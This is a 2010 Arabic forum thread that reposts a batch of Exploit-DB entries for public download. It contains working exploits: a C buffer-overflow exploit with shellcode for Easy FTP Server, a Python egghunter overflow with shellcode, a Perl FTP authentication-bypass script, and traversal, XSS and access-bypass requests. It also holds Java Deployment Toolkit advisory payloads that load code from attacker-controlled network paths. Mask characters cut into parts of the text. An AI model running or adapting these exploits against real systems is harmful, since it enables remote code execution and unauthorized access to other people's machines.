دخول
×

حسابٌ واحد لجميع خدماتنا !





إنشاء حساب
نقطة التطوير - dev-point.com







حماية الأجهزة لمعرفة طرق اختراق الأجهزة والبرامج والحيل المستخدمة في ذلك [ يُمنع طرح أدوات وبرامج الاختراق ] . . .


 تم تحميل الصفحة في 0,9061513 ثانية

ثغرات متنوعه
!  قم بقراءة قوانين الموقع قبل اضافة رد , اضغط هنا

LinkBack أدوات الموضوع انواع عرض الموضوع

  #1
xp-10
Active DeveloPer
 
الصورة الرمزية xp-10
 
   تاريخ التسجيل: 25 - 10 - 2009
   رقم العضوية : 80532
   المشاركات : 433
   بمعدل : 0.23 يوميا
   عدد النقاط : 217


xp-10 has a spectacular aura aboutxp-10 has a spectacular aura aboutxp-10 has a spectacular aura about

xp-10 غير متواجد حالياً




افتراضي ثغرات متنوعه قديم اضيفت بتاريخ 22-Apr-2010, 01:17 AM بواسطة WEB

السلام عليكم ورحمة الله وبركاته



# title: Completeftp server directory traversal
# edb-id: 11973
# cve-id: ()
# osvdb-id: ()
# author: Zombiefx
# published: 2010-03-30
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title: Completeftp server directory traversal

# date: 2010-03-30

# author: Zombiefx darkernet@gmail.com<mailto:darkernet@gmail.com>

# software link: http://www.enterprisedt.com/products...teftpsetup.exe

# version: Completeftp server v 3.3.0

# tested on: Windows xp sp3

# cve :

# code :

230 user test logged in.

Ftp> pwd

257 "/home/test" is current directory.

Ftp> cd ..\..\..\..\..\..\..\..\

250 directory changed to "/home/test/..\..\..\..\..\..\..\..\".

Ftp> get boot.ini

200 port command successful.

150 opening ascii mode data connection for boot.ini

226 transfer complete.

Ftp: 215 bytes received in 0.14seconds 1.54kbytes/sec.





# title: Java mini ************ server <= 1.0 path traversal and cross site scripting
# edb-id: 12033
# cve-id: ()
# osvdb-id: ()
# author: Cp77fk4r
# published: 2010-04-03
# verified: No
# download exploit code
# download vulnerable app

view sourceprint?# exploit title: Java mini ************ server <= 1.0 path draversal & cross site scripting.

# date: 20/03/10

# author: Cp77fk4r | empty0page[shift+2]gmail.com<http://gmail.com> | www.digitalwhisper.co.il<http://www.digitalwhisper.co.il>

# software link: http://www.jibble.org/mini************server/

# version: <= 1.0

# tested on: Jre build 1.6.0_17-b04

#

##[cross site scripting]

cross-site scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted ************ sites. Cross-site scripting (xss) attacks occur when an attacker uses a ************ application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a ************ application uses input from a user in the output it generates without validating or encoding it. (owasp)

#

get /%00">[your_xss_here]<"

#

#e.g:

-http request:

Get %00"><font color=red>work?</font><" http/1.1

host: Localhost

#

-http response (data):

<html><head><title>index of %00"><font color=red>work?</font><"/</title></head><body><h3>index of %00"><font color=red>work?</font><"/</h3><p>

<a href="%00"><font color=red>work?</font><"/simple************server.jar">simple************se rver.jar</a> <br>

</p><hr><p>simple************server http://www.jibble.org/</p></body><html>#

#

#

##[path traversal:]

a path traversal attack aims to access files and directories that are stored outside the ************ root folder. By browsing the application, the attacker looks for absolute links to files stored on the ************ server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The attacker uses “../” sequences to move up to root directory, thus permitting navigation through the file system. (owasp)

#

http://localhost/%5c%2e%2e%5c%2e%2e%...%2e%2e%5c1.txt

("1.txt" located in the root directory on the volume)

#

#

[e0f]


# title: Easy ftp server v1.7.0.2 mkd remote post-authentication bof exploit
# edb-id: 12044
# cve-id: ()
# osvdb-id: ()
# author: X90c
# published: 2010-04-04
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <sys/socket.h>

#include <netinet/in.h>



//************************************************** ***********************

// easy~ftp server v1.7.0.2 mkd remote post-authentication bof exploit

// ( 11470_x90c.c )

//

// date: 24/03/2010

// author: X90c < x90c.org >

//

// discovered by: Loneferret

//

// exploits by:

// [1] 11470.py (poc) - loneferret ( found: 13/02/2010 )

// - http://www.exploit-db.com/exploits/11470

// [2] 11470_x90c.c ( exploit )

// ( magic ret, ****************sploit ****************lcode )

//************************************************** ***********************





// ****************sploit ****************lcode ( calc.exe ) - 228 bytes

static char ****************lcode[] =

{

"\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\ x99\xe4\x93"

"\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\ x9e\x75\x4f"

"\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\ xf3\x82\x04"

"\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\ xca\x64\xdb"

"\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\ x3a\xfd\x3e"

"\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\ xf3\xfc\xc6"

"\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\ x37\x94\x21"

"\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\ xb0\x53\x11"

"\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\ xd2\xce\x4a"

"\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\ x62\x88\xb5"

"\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\ xb0\xf2\x21"

"\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\ xa8\x9f\x69"

"\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\ xc0\x29\x36"

"\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\ x83\x15\xd5"

"\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\ x29\xd7\x3b"

"\x1b\x35\x1d"

};



int main(int argc, char *argv[])

{

int sockfd;

struct sockaddr_in sa;

char rbuf[128];

char x0x[278];

int i = 0, j = 0;

int port = 0;

int err = 0;



printf("\n\n************************************** *********\n");

printf("* easy ftp server 1.7.0.2 mkd remote bof *\n");

printf("* found by: Loneferret *\n");

printf("* - http://www.exploit-db.com/exploits/11470 *\n");

printf("* - 11470_x90c.c - x90c *\n");

printf("****************************************** *********\n\n");



if( argc < 3 )

{

printf("usage: %s <target ip> <port>\n\n", argv[0]);

exit(1);

}



port = atoi(argv[2]);



if(port <= 0 || port > 65535)

{

port = 21;

}



printf("[port] %d/tcp\n", port);



memset(&sa, 0, sizeof(sa));

sa.sin_family = af_inet;

sa.sin_addr.s_addr = inet_addr(argv[1]);

sa.sin_port = htons(port);



if((sockfd = socket(pf_inet, sock_stream, ipproto_tcp)) == -1)

{

err = -1;

fprintf(stderr, "[!] socket failed\n");

goto out;

}



// socket connect

if(connect(sockfd, (struct sockaddr *)&sa, sizeof(struct sockaddr)) == -1)

{

err = -2;

fprintf(stderr, "[!] connection failed!\n");

goto out;

}



printf("[+] connected!\n");



// auth

recv(sockfd, rbuf, sizeof(rbuf), 0);



send(sockfd, "user anonymous\r\n", 16, 0);

recv(sockfd, rbuf, sizeof(rbuf), 0);

if(strstr(rbuf, "okay") != null)

printf("[user] anonymous\n");



send(sockfd, "pass anonymous\r\n", 16, 0);

recv(sockfd, rbuf, sizeof(rbuf), 0);

if(strstr(rbuf, "logged in.") != null)

printf("[pass] anonymous\n");



// fill payload

memset(&x0x, 0x90, sizeof(x0x));



for(i = 20, j = 0; j < strlen(****************lcode); j++)

x0x[i++] = ****************lcode[j];



x0x[0] = 'm';

x0x[1] = 'k';

x0x[2] = 'd';

x0x[3] = ' ';



// magic ret:

// # call ebp ( ebp register points to nopsled of this payload when overflowed )

// # 004041ec ffd5 |call ebp

// #

//

x0x[272] = '\xec';

x0x[273] = '\x41';

x0x[274] = '\x40';

x0x[275] = '\x00';



x0x[276] = '\r';

x0x[277] = '\n';

x0x[278] = '\x00';



printf("[+] sending payload...\n");



// send payload

send(sockfd, x0x, 278, 0);

recv(sockfd, rbuf, sizeof(rbuf), 0);

if((strstr(rbuf, "denied.") != null) || (strstr(rbuf, "too long") != null))

{

printf("[!] anonymous account doesn't have permission to mkd command...\n");

printf("[!] exploit failed. ;-x\n");

goto out;

}



printf("[+] exploited :-)\n");



out:

Close(sockfd);

return err;

}

# title: Miniature java ************ server <= 1.71 multiple vulnerabilities
# edb-id: 12114
# cve-id: ()
# osvdb-id: ()
# author: Cp77fk4r
# published: 2010-04-08
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title: Miniature java ************ server <= 1.71 multiple vulnerabilities.

# date: 26/03/10

# author: Cp77fk4r | empty0page[shift+2]gmail.com<http://gmail.com> | www.digitalwhisper.co.il<http://www.digitalwhisper.co.il>

# software link: http://tjws.sourceforge.net/#download

# version: <= 1.71

# tested on: Jre build 1.6.0_17-b04

#

##[path traversal:]

a path traversal attack aims to access files and directories that are stored outside the ************ root folder. By browsing the application, the attacker looks for absolute links to files stored on the ************ server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The attacker uses “../” sequences to move up to root directory, thus permitting navigation through the file system. (owasp)

#

http://localhost/..%5c..%5c..%5c..%5....%5c..%5c..%5c

(you'll get the root directory on the volume)

#

#

##[open redirect:]

an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. (owasp)

#

http request:

#

get /%00 http/1.1\r\nhost: Digitalwhisper.co.il<http://digitalwhisper.co.il>\r\n\r\n

#

lead to:

#

http response:

#

http/1.1 302 moved temporarily

content-type: Text/html

location: http://digitalwhisper.co.il/ /

connection: Keep-alive

date: Thu, 25 mar 2010 1740 gmt

keep-alive: Timeout=30, max=100

content-length: 303

server: D. Rogatkin's tjws based on acme.serve/version 1.71, $revision: 1.199 $

mime-version: 1.0



<html><head><title>302 moved</title></head><body bgcolor="#d1e9fe"><h2>302 moved</h2>this document has moved <a href=http://digitalwhisper.co.il/

#

#

##[403 (forbidden) bypass:] (insufficient authorization)

insufficient authorization results when an application does not perform adequate authorization checks to ensure that the user is performing a function or accessing data in a manner consistent with the security policy. Authorization procedures should enforce what a user, service or application is permitted to do. When a user is authenticated to a ************ site, it does not necessarily mean that the user should have full access to all content and functionality. (wasc)

#

the attacker can bypass a forbidden file by adding %2f before the forbidden folder/file.

#

#e.g:

Http request:

#

get /demo-servlets/************-inf/config/mishka.properties http/1.1

host: Localhost

#

lead to:

#

http response:

#

http/1.1 403 forbidden

content-type: Text/html

connection: Keep-alive

date: Thu, 25 mar 2010 1756 gmt

keep-alive: Timeout=30, max=100

content-length: 243

server: D. Rogatkin's tjws based on acme.serve/version 1.71, $revision: 1.199 $

mime-version: 1.0



<html><head><title>403 forbidden</title></head><body bgcolor="#d1e9fe"><h2>403 forbidden</h2><hr><address><a href="http://tjws.sourceforge.net">d. Rogatkin's tjws based on acme.serve version 1.71, $revision: 1.199 $</a></address></body></html>

#

but:

#

http request:

#

get /demo-servlets/%2f************-inf/config/mishka.properties http/1.1

host: Localhost

#

lead to:

#

http reqponse:

#

http/1.1 200 ok

content-type: Unknown

connection: Keep-alive

date: Thu, 08 apr 2010 1835 gmt

last-modified: Thu, 25 mar 2010 16:41:58 gmt

keep-alive: Timeout=30, max=100

content-length: 364

server: D. Rogatkin's tjws based on acme.serve/version 1.71, $revision: 1.199 $

mime-version: 1.0



# xml persistant storage location

config=mishka.xml

workerprefix=javaarchitect.servlet.mishka.

# html template path

templateroot=/javaarchitect/servlet/mishka/resource

password=*************

messageboard_password=*************

#messageboard_realmname=lunch administrator

defaultservant=frontpage

charset=koi8-r

messageboardstore=lunchboard.store

debug=1

#

#

##[full path disclosure:]

full path disclosure (fpd) vulnerabilities enable the attacker to see the path to the ************root/file. E.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a sql injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (owasp)

#

http://localhost/demo-servlets/snoop.jsp

#

#

[e0f]



# title: Java ************ start arbitrary command-line injection
# edb-id: 12122
# cve-id: ()
# osvdb-id: ()
# author: Ruben santamarta
# published: 2010-04-09
# verified: Yes
# download exploit code
# download n/a

view sourceprint?bye bye my little 0day :(, tavis ormandy did a great job uncovering a big logic flaw within java jre. I discovered that bug and other that affects every browser few weeks ago and i posted the common "0day++" tweet.



The method in which java ************ start support has been added to the jre is not less than a deliberately embedded backdoor(i really don't think so) or a flagrant case of extreme negligence (+1). Let's see:



Java plugin for browsers (chrome,firefox...) - windows: Npjp2.dll (the same for ie8's jp2iexp.dll)



.text:6daa3d96

.text:6daa3d96 ; =============== s u b r o u t i n e =======================================

.text:6daa3d96

.text:6daa3d96 ; attributes: Bp-based frame

.text:6daa3d96

.text:6daa3d96 sub_6daa3d96 proc near ; code xref: Sub_6daa2acb+170p

.text:6daa3d96

.text:6daa3d96 data = byte ptr -264h

.text:6daa3d96 var_263 = byte ptr -263h

.text:6daa3d96 applicationname = byte ptr -160h

.text:6daa3d96 startupinfo = _startupinfoa ptr -5ch

.text:6daa3d96 processinformation= _process_information ptr -18h

.text:6daa3d96 cbdata = dword ptr -8

.text:6daa3d96 hkey = dword ptr -4

.text:6daa3d96 arg_0 = dword ptr 8

.text:6daa3d96 arg_4 = dword ptr 0ch

.text:6daa3d96

.text:6daa3d96 push ebp

.text:6daa3d97 mov ebp, esp

.text:6daa3d99 sub esp, 264h

.text:6daa3d9f push edi

.text:6daa3da0 lea eax, [ebp+hkey]

.text:6daa3da3 push eax ; phkresult

.text:6daa3da4 push 20019h ; samdesired

.text:6daa3da9 xor edi, edi

.text:6daa3dab push edi ; uloptions

.text:6daa3dac push offset subkey ; "jnlpfile\\****************l\\open\\command"

.text:6daa3db1 push 80000000h ; hkey

.text:6daa3db6 mov [ebp+cbdata], 104h

.text:6daa3dbd call ds:regopenkeyexa

.text:6daa3dc3 test eax, eax

.text:6daa3dc5 jz short loc_6daa3dce

.text:6daa3dc7 xor eax, eax

.text:6daa3dc9 jmp loc_6daa3f16







the default handler is "javaws.exe",continuing...



.text:6daa3eb7 push [ebp+arg_4]

.text:6daa3eba push eax

.text:6daa3ebb push offset asdocbasess ; "\"%s\" -docbase %s %s"

.text:6daa3ec0 push esi ; lpstr

.text:6daa3ec1 call ebx ; wsprintfa

.text:6daa3ec3 add esp, 14h

.text:6daa3ec6 jmp short loc_6daa3ed4

.text:6daa3ec8 ; ---------------------------------------------------------------------------

.text:6daa3ec8

.text:6daa3ec8 loc_6daa3ec8: ; code xref: Sub_6daa3d96+11fj

.text:6daa3ec8 push eax

.text:6daa3ec9 push offset ass_0 ; "\"%s\" %s"

.text:6daa3ece push esi ; lpstr

.text:6daa3ecf call ebx ; wsprintfa

.text:6daa3ed1 add esp, 10h

.text:6daa3ed4

.text:6daa3ed4 loc_6daa3ed4: ; code xref: Sub_6daa3d96+130j

.text:6daa3ed4 push 11h

.text:6daa3ed6 pop ecx

.text:6daa3ed7 xor eax, eax

.text:6daa3ed9 lea edi, [ebp+startupinfo]

.text:6daa3edc rep stosd

.text:6daa3ede lea eax, [ebp+processinformation]

.text:6daa3ee1 push eax ; lpprocessinformation

.text:6daa3ee2 xor ebx, ebx

.text:6daa3ee4 lea eax, [ebp+startupinfo]

.text:6daa3ee7 push eax ; lpstartupinfo

.text:6daa3ee8 push ebx ; lpcurrentdirectory

.text:6daa3ee9 push ebx ; lpenvironment

.text:6daa3eea push ebx ; dwcreationflags

.text:6daa3eeb push ebx ; binherithandles

.text:6daa3eec push ebx ; lpthreadattributes

.text:6daa3eed push ebx ; lpprocessattributes

.text:6daa3eee push esi ; lpcommandline

.text:6daa3eef lea eax, [ebp+applicationname]

.text:6daa3ef5 push eax ; lpapplicationname

.text:6daa3ef6 mov [ebp+startupinfo.cb], 44h

.text:6daa3efd call ds:createprocessa







so basically the java-plugin browser is running "javaws.exe" without validating command-line parameters. These parameters can be controlled by attackers via specially crafted embed html tags within a ************page.



Let's see javadeploy.txt:



If (browser == 'msie') {



document.write('<' +

'object classid="clsid:8ad9c840-044e-11d1-b3e9-00805f499d93" ' +

'width="0" height="0">' +

'<' + 'param name="launchjnlp" value="' + jnlp + '"' + '>' +

'<' + 'param name="docbase" value="' + jnlpdocbase + '"' + '>' +

'<' + '/' + 'object' + '>');

} else if (browser == 'netscape family') {



document.write('<' +

'embed type="application/x-java-applet;jpi-version=' +

deployjava.firefoxjavaversion + '" ' +

'width="0" height="0" ' +

'launchjnlp="' + jnlp + '"' +

'docbase="' + jnlpdocbase + '"' +

' />');

}





that's it. This is how java plugin identifies java ************ start content (jnlp files).so we can inject command-line parameters through "docbase" tag and even "launchjnlp".



What type of arguments can we abuse to compromise a system?

Java.exe and javaw.exe support an undocumented-hidden command-line parameter "-xxaltjvm" and curiosly also "-j-xxaltjvm" (see -j switch in javaws.exe). This instructs java to load an alternative javavm library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -xxaltjvm=\\ip\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye aslr, dep...



Linux



same logic error, check this function "_z10launchjnlppkcs0" in libnpjp2.so



macosx



not vulnerable.



Workaround



disable javaws/javaws.exe in linux and windows by any mean. Disable deployment toolkit to avoid unwanted installation as stated in tavis' advisory.


# title: Windows ftp server by dwg (auth bypass)
# edb-id: 12119
# cve-id: ()
# osvdb-id: ()
# author: Chap0
# published: 2010-04-09
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title: Windows ftp server by dwg (auth bypass)

# date: April 09, 2010

# software link: [http://www.windowsftpserver.com/free_download.html]

# version: V 1.4

# tested on: Windows xp sp3

# author: Chap0

# email: Chap0x90[at]gmail[dot]com

# site: [www.setfreesecurity.com]

#

# windows ftp server by dwg software is vulnerable to

# authentication-bypass that will allow attackers to

# connect with any username and password.

# this give attackers full access to the top level

# directory of the ftp server.

#

# greetz and many thanks to all exploit-dbers and god gets the glory

#

#

#!/usr/bin/perl



use io::socket;



$luser = "evil";

$pass = "hacker";



$mysock = io::socket::inet->new(peeraddr =>'192.168.2.6', peerport => '21', proto => 'tcp');



print "connecting with a bad credentials. . .\n";

sleep(1);



print $mysock "user $luser\r\n";

print $mysock "pass $pass\r\n";



print "making hacked folder . . .\n";

sleep(2);



print $mysock "mkd hacked\r\n";



print "done . . .\n";

sleep(1);

# title: Java deployment toolkit performs insufficient validation of parameters
# edb-id: 12117
# cve-id: ()
# osvdb-id: ()
# author: Tavis ormandy
# published: 2010-04-09
# verified: Yes
# download exploit code
# download n/a

view sourceprint?java deployment toolkit performs insufficient validation of parameters

-------------------------------------------------------------------------



java ************ start (henceforth, jws) provides java developers with a way to let

users launch and install their applications using a url to a java networking

launching protocol (.jnlp) file (essentially some xml describing the

program).



Since java 6 update 10, sun has distributed an npapi plugin and activex control

called "java deployment toolkit" to provide developers with a simpler method

of distributing their applications to end users. This toolkit is installed by

default with the jre and marked safe for scripting.



The launch() method provided by the toolkit object accepts a url string, which

it passes to the registered handler for jnlp files, which by default is the

javaws utility.



$ cmd /c ver

microsoft windows xp [version 5.1.2600]



$ java -version

java version "1.6.0_19"

java(tm) se runtime environment (build 1.6.0_19-b04)

java hotspot(tm) client vm (build 16.2-b04, mixed mode, sharing)



$ cat /proc/registry/hkey_local_machine/software/classes/jnlpfile/****************l/open/command/\@

"c:\program files\java\jre6\bin\javaws.exe" "%1"



the toolkit provides only minimal validation of the url parameter, allowing us

to pass arbitrary parameters to the javaws utility, which provides enough

functionality via command line arguments to allow this error to be exploited.



The simplicity with which this error can be discovered has convinced me

that releasing this document is in the best interest of everyone except

the vendor.



--------------------

affected software

------------------------



all versions since java se 6 update 10 for microsoft windows are believed to be

affected by this vulnerability. Disabling the java plugin is not sufficient to

prevent exploitation, as the toolkit is installed independently.



http://java.sun.com/javase/6/docs/te...nt_advice.html



i believe non-windows installations are unaffected.



--------------------

consequences

-----------------------



exploitation of this issue is not terribly exciting, but is potentially of high

enough impact to merit explanation. The javaws application supports the

following command line parameters.



$ javaws -help

usage: Javaws [run-options] <jnlp-file>

javaws [control-options]



where run-options include:

-verbose display additional output

-offline run the application in offline mode

-system run the application from the system cache only

-xnosplash run without showing a splash screen

-j<option> supply option to the vm

-wait start java process and wait for its exit



control-options include:

-viewer show the cache viewer in the java control panel

-uninstall remove all applications from the cache

-uninstall <jnlp-file> remove the application from the cache

-import [import-options] <jnlp-file> import the application to the cache



import-options include:

-silent import silently (with no user interface)

-system import application into the system cache

-codebase <url> retrieve resources from the given codebase

-shortcut install shortcuts as if user allowed prompt

-association install associations as if user allowed prompt



perhaps the most interesting of these is -j, and the obvious attack is simply

to add -jar followed by an attacker controlled unc path to the jvm command

line, which i've demonstrated below. Other attacks are clearly possible, but

this is sufficient to demonstrate the problem.



In order to trigger this attack in internet explorer, an attacker would use a

code sequence like this



/* ... */

var o = document.createelement("object");



o.classid = "clsid:cafeefac-dec7-0000-0000-abcdeffedcba";



o.launch("http: -j-jar -j\\\\attacker.controlled\\exploit.jar none");

/* ... */



or, for mozilla firefox



/* ... */

var o = document.createelement("object");



o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"



document.body.appendchild(o);



o.launch("http: -j-jar -j\\\\attacker.controlled\\exploit.jar none");

/* ... */



please note, at some point the registered mime type was changed to

application/java-deployment-toolkit, please verify which type applies to

your users when verifying any mitigation implemented has been effective (the

simplest way would be to look at the output of about:plugins on a reference

machine).



A harmless demonstration is provided below.

http://lock.cmpxchg8b.com/bb5eafbc6c.../testcase.html



<html>

<head><title>java deployment toolkit test page</title></head>

<body>

****************************************

// tavis ormandy <taviso@sdf.lonestar.org>, april 2010



var u = "http: -j-jar -j\\\\lock.cmpxchg8b.com\\calc.jar none";



if (window.navigator.appname == "microsoft internet explorer") {

var o = document.createelement("object");



o.classid = "clsid:cafeefac-dec7-0000-0000-abcdeffedcba";



// trigger the bug

o.launch(u);

} else {

// mozilla

var o = document.createelement("object");

var n = document.createelement("object");



o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";

n.type = "application/java-deployment-toolkit";

document.body.appendchild(o);

document.body.appendchild(n);



// test both mime types

try {

// old type

o.launch(u);

} catch (e) {

// new type

n.launch(u);

}

}



// bonus vulnerability, why not downgrade victim to a jre vulnerable to

// this classic exploit?

// http://sunsolve.sun.com/search/docum...=1-66-244991-1



// o.installjre("1.4.2_18");

</script>

</body>

</html>





-------------------

mitigation

-----------------------



if you believe your users may be affected, you should consider applying one of

the workarounds described below as a matter of urgency.



- internet explorer users can be protected by temporarily setting the killbit

on cafeefac-dec7-0000-0000-abcdeffedcba. To the best of my knowledge, the

deployment toolkit is not in widespread usage and is unlikely to impact end

users.



- mozilla firefox and other npapi based browser users can be protected using

file system acls to prevent access to npdeploytk.dll. These acls can also be

managed via gpo.



Detailed documentation on killbits is provided by microsoft here



http://support.microsoft.com/kb/240797



domain administrators can deploy killbits and file system acls using gpos, for

more information on group policy, see microsoft's group policy site, here



http://technet.microsoft.com/en-us/w.../bb310732.aspx



you may be tempted to kill the hklm\...\jnlpfile\****************l\open\command key, but

the author does not believe this is sufficient, as the plugin also provides

enough functionality to install and downgrade jre installations without

prompting (seriously). However, if none of your affected users are local

administrators, this solution may work (untested).



As always, if you do not require this feature, consider permanently disabling

it in order to reduce attack surface.



-------------------

solution

-----------------------



sun has been informed about this vulnerability, however, they informed me they

do not consider this vulnerability to be of high enough priority to break their

quarterly patch cycle.



For various reasons, i explained that i did did not agree, and intended to

publish advice to temporarily disable the affected control until a solution is

available.



-------------------

credit

-----------------------



this bug was discovered by tavis ormandy.



This work is my own, and all of the opinions expressed are mine, not my

employers or anybody elses (i added this for you, dan. Thanks ;-)).



-------------------

greetz

-----------------------



greetz to julien, neel, redpig, lcamtuf, spoonm, skylined, asirap, liquidk,

scarybeasts, headhntr, jagger, sami and roach.



Some very elite friends have started a consultancy called inverse path, you

should really hire them.



http://www.inversepath.com/



-------------------

references

-----------------------



- deploying java with jnlp, sun microsystems.

http://java.sun.com/developer/techni...gramming/jnlp/



-------------------

notes

-----------------------



my advisories are intended to be consumed by a technical audience of security

professionals and systems administrators who are familiar with the principal

for which the mailing list you have subscribed to is named. If you do not fall

into this category, you can get up to speed by reading this accessible and

balanced essay on the disclosure debate by bruce schneier.



http://www.schneier.com/crypto-gram-0111.html#1



some of us would appreciate it if you made the effort to research and

understand the issues involved before condemning us :-)
ثغرات متنوعه كلها 2010 ان لقيت شئ تستفيد منه خذه وان مالقيت بلاش انتقادات ودمتم بود
  #2
xp-10
Active DeveloPer
 
الصورة الرمزية xp-10
 
   تاريخ التسجيل: 25 - 10 - 2009
   رقم العضوية : 80532
   المشاركات : 433
   بمعدل : 0.23 يوميا
   عدد النقاط : 217


xp-10 has a spectacular aura aboutxp-10 has a spectacular aura aboutxp-10 has a spectacular aura about

xp-10 غير متواجد حالياً




افتراضي رد: ثغرات متنوعه قديم اضيفت بتاريخ 22-Apr-2010, 01:20 AM بواسطة WEB


# title: Easy~ftp server v1.7.0.2 (http) remote bof exploit
# edb-id: 11500
# cve-id: ()
# osvdb-id: ()
# author: The g0bl!n
# published: 2010-02-18
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title: Easy~ftp server v1.7.0.2 (http) remote bof exploit

# date: 18-02-2010

# author: The g0bl!n

# software link: http://cdnetworks-us-2.dl.sourceforg...vr-1.7.0.2.zip

# code :

#!/usr/bin/python



import sys

import socket

import base64



if len(sys.argv) != 4:

Print "\n*********************************************** *****"

print "[*] easy~ftp server v1.7.0.2 (http) remote bof exploit\n"

print "[*] usage : ./sploit.py <target_ip> <user> <password>\n"

print "[*] example : ./sploit.py 192.168.1.3 anonymous w00t\n"

print "************************************************* ****"

sys.exit(0)



user = sys.argv[2]

pwd = sys.argv[3]

auth = base64.b64encode(user+":"+pwd)



# win32_exec - exitfunc=process cmd=calc size=160 encoder=pexfnstenvsub http://****************sploit.com

****************lcode=(

"\x44\x7a\x32\x37\x44\x7a\x32\x37"

"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\ x49\x49\x49\x49"

"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\ x41\x30\x42\x36"

"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\ x44\x42\x48\x34"

"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\ x30\x41\x44\x41"

"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\ x4a\x4e\x46\x44"

"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x43\ x4b\x38\x4e\x47"

"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x44\ x4a\x41\x4b\x48"

"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x58\ x46\x53\x4b\x58"

"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\ x46\x48\x42\x4c"

"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\ x44\x4c\x4b\x4e"

"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x30\x45\x37\ x45\x4e\x4b\x58"

"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\ x4e\x30\x4b\x54"

"\x4b\x58\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x4b\x48\ x4e\x51\x4b\x58"

"\x41\x50\x4b\x4e\x49\x58\x4e\x35\x46\x32\x46\x50\ x43\x4c\x41\x33"

"\x42\x4c\x46\x56\x4b\x48\x42\x54\x42\x43\x45\x58\ x42\x4c\x4a\x57"

"\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x57\ x4e\x51\x4d\x4a"

"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x38\ x42\x48\x42\x4b"

"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x36\x4e\x53\ x4f\x45\x41\x43"

"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x38\ x42\x4c\x4b\x57"

"\x42\x35\x4a\x56\x50\x57\x4a\x4d\x44\x4e\x43\x37\ x4a\x56\x4a\x59"

"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\ x43\x36\x41\x46"

"\x4e\x36\x43\x36\x42\x50\x5a")



egghunter=(

"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\ x3c\x05\x5a\x74"

"\xef\xb8\x44\x7a\x32\x37\x8b\xfa\xaf\x75\xea\xaf\ x75\xe7\xff\xe7")



buf = "\x61"*268

buf += "\xf0\x69\x83\x7c" #call esp xp sp3

buf += "\x63"*8

buf += egghunter



head = "get /list.html?path="+buf+" http/1.1\r\n"

head += "host: "+****************lcode+"\r\n"

head += "authorization: Basic "+auth+"\r\n"



try:

S = socket.socket(socket.af_inet,socket.sock_stream)

s.connect((sys.argv[1],8080))

s.send(head + "\r\n")

print "[x] payload sended waiting for ****************lcode..."

s.close()

except:

Print "error!"

# title: Git************ v1.5.2 remote command execution
# edb-id: 11497
# cve-id: (2008-5516)
# osvdb-id: ()
# author: S2 crew
# published: 2010-02-18
# verified: No
# download exploit code
# download n/a

view sourceprint?# exploit title: Git************ remote command execution

# date: 2009.06.19

# author: S2 crew [hungary]

# software link: -

# version: Git 1.5.2

# tested on: Debian linux, git 1.5.2

